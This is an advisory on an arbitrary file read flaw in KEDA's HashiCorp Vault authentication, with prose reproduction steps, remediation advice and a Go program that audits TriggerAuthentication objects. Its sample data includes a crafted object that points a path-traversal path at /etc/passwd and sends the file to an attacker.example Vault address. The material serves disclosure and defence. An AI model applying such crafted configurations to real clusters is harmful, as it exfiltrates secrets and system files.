KEDA Arbitrary File Read Vulnerability in HashiCorp Vault Authentication
Vulnerability
An arbitrary file read vulnerability has been identified in KEDA versions prior to 2.17.3 (on the 2.17 line) and prior to 2.18.3 (on the 2.18 line). It affects KEDA resources that use a TriggerAuthentication to configure HashiCorp Vault authentication. The issue arises from inadequate path validation when loading the Service Account Token file whose path is given in the HashiCorp Vault credential (the hashiCorpVault.credential.serviceAccount field, which normally points at the projected token under /var/run/secrets/kubernetes.io/serviceaccount/): the KEDA operator reads whatever path it is handed. An attacker with permission to create or modify a TriggerAuthentication resource can exploit this to read files from the node where the KEDA pod is running. Because the read is performed by the KEDA operator process, the reachable files are those visible to that container: its own filesystem, mounted volumes such as the operator's own service account token, and any host paths mounted into the pod. The exfiltrated files could include sensitive information such as secrets, keys, or system files like /etc/passwd.
Impact
Exploitation of this vulnerability allows arbitrary file read with the privileges of the KEDA operator. The file contents are not only read but also transmitted: KEDA uses them as the token in its Vault login request, and the Vault address is itself part of the attacker-controlled TriggerAuthentication, so the data can be exfiltrated to a remote server of the attacker's choosing.
Reproduction
To reproduce this vulnerability, create or modify a TriggerAuthentication resource in KEDA whose hashiCorpVault section uses the kubernetes authentication method, sets credential.serviceAccount to the path of a file containing sensitive information (for example /etc/passwd), and sets address to a server under the attacker's control. Once the TriggerAuthentication is applied and referenced by a ScaledObject or ScaledJob, the KEDA operator reads the file and submits its contents as the token in the Vault Kubernetes-auth login request to that address, thereby exfiltrating the data to the attacker's server.
Remediation
Users should upgrade to KEDA version 2.17.3, 2.18.3, or 2.19.0 (or later) to address this vulnerability. Additionally, restrict the create, update and patch verbs on triggerauthentications.keda.sh (and on clustertriggerauthentications.keda.sh, which carries the same hashiCorpVault spec) to trusted and authorized users only, and audit existing TriggerAuthentication objects for a credential.serviceAccount path outside the projected service account token directory or a Vault address that is not your own Vault.
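As an added example (not code from this page or from the KEDA project), the following Go program ties together the reproduction shape above and the audit step of the remediation: it embeds, as constructed JSON in the form of kubectl's list output, one benign TriggerAuthentication and one crafted so that credential.serviceAccount escapes the projected token directory and address points at an attacker host, then flags the crafted one. The field names follow KEDA's TriggerAuthentication schema; the path rule IsAllowedServiceAccountTokenPath is an illustrative hardening check and an assumption of this example, not KEDA's actual fix; the object names vault-ok, vault-exfil and static-token and the hosts vault.internal and attacker.example are made up.

```go
package main

import (
	"encoding/json"
	"fmt"
	"path/filepath"
)

// saTokenDir is where Kubernetes projects a pod's service account token. The only
// file a Vault kubernetes-auth login legitimately needs is <saTokenDir>/token; any
// other path turns the field into a file-read primitive.
const saTokenDir = "/var/run/secrets/kubernetes.io/serviceaccount"

// IsAllowedServiceAccountTokenPath is an illustrative hardening rule (an assumption
// of this example, not KEDA's patch): the path must be absolute, must already be
// clean (no "..", "." or "//" segments that filepath.Clean would rewrite) and must
// name a file directly inside saTokenDir. It is a lexical check only; it does not
// follow symlinks.
func IsAllowedServiceAccountTokenPath(p string) bool {
	if p == "" || !filepath.IsAbs(p) {
		return false
	}
	if filepath.Clean(p) != p {
		return false
	}
	return filepath.Dir(p) == saTokenDir
}

// triggerAuthList mirrors the subset of `kubectl get triggerauthentications -A -o json`
// used here. Field names follow KEDA's TriggerAuthentication schema.
type triggerAuthList struct {
	Items []struct {
		Metadata struct {
			Name      string `json:"name"`
			Namespace string `json:"namespace"`
		} `json:"metadata"`
		Spec struct {
			HashiCorpVault *struct {
				Address    string `json:"address"`
				Credential *struct {
					ServiceAccount string `json:"serviceAccount"`
				} `json:"credential"`
			} `json:"hashiCorpVault"`
		} `json:"spec"`
	} `json:"items"`
}

// Finding is one TriggerAuthentication whose Vault credential would make the KEDA
// operator read a file outside saTokenDir and send it to Address as the login token.
type Finding struct {
	Namespace, Name, Path, Address string
}

// AuditTriggerAuthentications parses kubectl's JSON list output and returns a
// Finding per object with a serviceAccount path that fails the rule above.
// Objects without a Vault section, or using a static Vault token, are skipped.
func AuditTriggerAuthentications(raw []byte) ([]Finding, error) {
	var list triggerAuthList
	if err := json.Unmarshal(raw, &list); err != nil {
		return nil, fmt.Errorf("parse TriggerAuthentication list: %w", err)
	}
	var findings []Finding
	for _, it := range list.Items {
		v := it.Spec.HashiCorpVault
		if v == nil || v.Credential == nil || v.Credential.ServiceAccount == "" {
			continue
		}
		if IsAllowedServiceAccountTokenPath(v.Credential.ServiceAccount) {
			continue
		}
		findings = append(findings, Finding{
			Namespace: it.Metadata.Namespace, Name: it.Metadata.Name,
			Path: v.Credential.ServiceAccount, Address: v.Address,
		})
	}
	return findings, nil
}

// SampleTriggerAuthList is constructed data in the shape of kubectl's list output
// (not output from a real cluster). vault-exfil is the crafted object.
const SampleTriggerAuthList = `{"items": [
  {"metadata": {"name": "vault-ok", "namespace": "payments"},
   "spec": {"hashiCorpVault": {"address": "https://vault.internal:8200",
     "authentication": "kubernetes", "role": "keda", "mount": "kubernetes",
     "credential": {"serviceAccount": "/var/run/secrets/kubernetes.io/serviceaccount/token"}}}},
  {"metadata": {"name": "vault-exfil", "namespace": "dev"},
   "spec": {"hashiCorpVault": {"address": "https://attacker.example:8200",
     "authentication": "kubernetes", "role": "keda", "mount": "kubernetes",
     "credential": {"serviceAccount": "/var/run/secrets/kubernetes.io/serviceaccount/../../../../../etc/passwd"}}}},
  {"metadata": {"name": "static-token", "namespace": "dev"},
   "spec": {"hashiCorpVault": {"address": "https://vault.internal:8200",
     "authentication": "token", "credential": {"token": "hvs.placeholder"}}}}
]}`

func main() {
	findings, err := AuditTriggerAuthentications([]byte(SampleTriggerAuthList))
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s/%s: serviceAccount %q would be sent to %s\n", f.Namespace, f.Name, f.Path, f.Address)
	}
}
```

To run it against a live cluster, feed the bytes of kubectl get triggerauthentications -A -o json (and likewise clustertriggerauthentications) to AuditTriggerAuthentications instead of the embedded sample; a finding whose Address is not your Vault is the strongest signal of an exfiltration attempt, while a plain traversal path with your real Vault address still reveals the file to your Vault server's logs.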
